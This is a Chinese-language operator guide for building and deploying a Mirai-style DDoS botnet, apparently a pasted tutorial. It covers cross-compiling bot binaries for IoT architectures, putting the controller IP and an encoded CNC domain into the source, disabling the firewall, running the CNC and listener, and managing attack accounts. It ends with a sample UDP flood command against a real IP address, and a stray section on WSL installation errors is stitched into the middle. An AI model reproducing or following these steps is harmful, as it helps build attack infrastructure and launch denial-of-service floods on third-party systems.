要求系统
- Linux centos 7.9（首选）
- 4H处理器（首选）
- 8GB 内存（仅在加载大量机器人时，即 50k+）
- 1GBPS 网络（首选）
1.一键复制安装命令
----------------------------------------------------------------------------
yum update -y
yum install epel-release -y
yum groupinstall "Development Tools" -y
yum install gmp-devel -y
ln -s /usr/lib64/libgmp.so.3  /usr/lib64/libgmp.so.10
yum install screen wget bzip2 gcc nano gcc-c++ electric-fence sudo git libc6-dev httpd xinetd tftpd tftp-server mysql mysql-server gcc glibc-static -y
--------------------------------------------------------------------------------
2.一键复制安装命令
-----------------------------------------------------------------------------
cd /tmp
wget https://dl.google.com/go/go1.13.linux-amd64.tar.gz
sha256sum go1.13.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.13.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin
export GOROOT=/usr/local/go
export GOPATH=$HOME/Projects/Proj1
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
export GOROOT=/usr/local/go; export GOPATH=$HOME/Projects/Proj1; export PATH=$GOPATH/bin:$GOROOT/bin:$PATH; go get github.com/go-sql-driver/mysql; go get github.com/mattn/go-shellwords
source ~/.bash_profile
go version
go env
cd ~/
----------------------------------------------------------------------------
help帮助1：

// 把僵尸网络的这些文件修改成你的ip
loader/src/main.c
loader/src/headers/config.h
dlr/main.c

// 选择域名上线
gcc enc.c -o enc
./enc string wearedos.xyz
并在 table.c 文件中添加 TABLE_CNC_DOMAIN
您的域它连接到托管僵尸网络的IP

它将输出一个十六进制字符串，其中包含该字符串的数据量，获取该数据并转到步骤
add_entry(TABLE_CNC_DOMAIN, "\x59\x4B\x4F\x5C\x4B\x4A\x41\x5D\x00\x56\x57\x54\x2E", 17);

---------------------------------------------------------------------------------
3.复制安装命令

mkdir /etc/xcompile
cd /etc/xcompile
--------------------------------------------------------------------------------
4.复制安装命令

wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2
wget http://distro.ibiblio.org/slitaz/sources/packages/c/cross-compiler-armv6l.tar.bz2
wget https://landley.net/aboriginal/downloads/old/binaries/1.2.6/cross-compiler-armv7l.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-x86_64.tar.bz2
------------------------------------------------------------------------------
5. 复制安装命令

tar -jxf cross-compiler-i586.tar.bz2
tar -jxf cross-compiler-m68k.tar.bz2
tar -jxf cross-compiler-mips.tar.bz2
tar -jxf cross-compiler-mipsel.tar.bz2
tar -jxf cross-compiler-powerpc.tar.bz2
tar -jxf cross-compiler-sh4.tar.bz2
tar -jxf cross-compiler-sparc.tar.bz2
tar -jxf cross-compiler-armv4l.tar.bz2
tar -jxf cross-compiler-armv5l.tar.bz2
tar -jxf cross-compiler-armv6l.tar.bz2
tar -jxf cross-compiler-armv7l.tar.bz2
tar -jxf cross-compiler-x86_64.tar.bz2
rm -rf *.tar.*
---------------------------------------------
mv cross-compiler-i586 i586
mv cross-compiler-m68k m68k
mv cross-compiler-mips mips
mv cross-compiler-mipsel mipsel
mv cross-compiler-powerpc powerpc
mv cross-compiler-sh4 sh4
mv cross-compiler-sparc sparc
mv cross-compiler-armv4l armv4l
mv cross-compiler-armv5l armv5l
mv cross-compiler-armv6l armv6l
mv cross-compiler-armv7l armv7l
mv cross-compiler-x86_64 x86_64
------------------------------------------------------
cd
------------------------------------------------------

// 启动相关服务

service firewalld stop
service iptables stop 
service httpd restart  
service mariadb stop

进入安装编译

cd cnc/
sh build.sh
-------------------------------
进入root命令交叉编译僵尸网络

cd ~/
chmod 777 *
sh build.sh
----------------------------------------------------

// 启动cnc主控并且监听攻击

cd cnc/
screen ./cnc 55650 1997 750
按键盘上 ctrl+A+D
screen ./listen
按键盘上 ctrl+A+D

//
cnc目录下的logins.txt是添加用户和管理用户的文件
举例
root root -1 120 1 all 1
账户 密码 -1 最大攻击时间 当前账户最高攻击时间 all 1和0代表是否管理员权限 1是管理员 0是普通用户

帮助：55650是bot端口（如果你想替换它，请转到bot/main.c文件第429行），1997是cnc端口，750是线程（最大线程是750）


解决方法：

键盘行按键win+x，选择Windows PowerShell（管理员）
输入
Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux
1
回车输入Y并重启。 重启打开Ubuntu的命令窗口，等几分钟，输入账户和密码即可。
或者
控制面板打开也行


适用于Linux的Windows子系统 这个勾选上，确定，安装后重启电脑。

错误二：Error Code: 0x8000000D

出现这种错误多半是在执行完上面错误一里解决方法中描述的重启电脑后，还没等几分钟就心急关闭电脑，这个时候UBUNTU没来得及安装然后就出现报错。

解决方法：

重新输入

Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux
1
然后重新打开Ubuntu 的命令窗口，等几分钟，让它安装完毕，然后按照提示一步一步走下去即可。
————————————————


.udp 185.36.25.1 60 dport=22 len=1024

攻击指令和模式可以随意添加  .udp 目标 攻击时间 目标端口 攻击字节

最大1440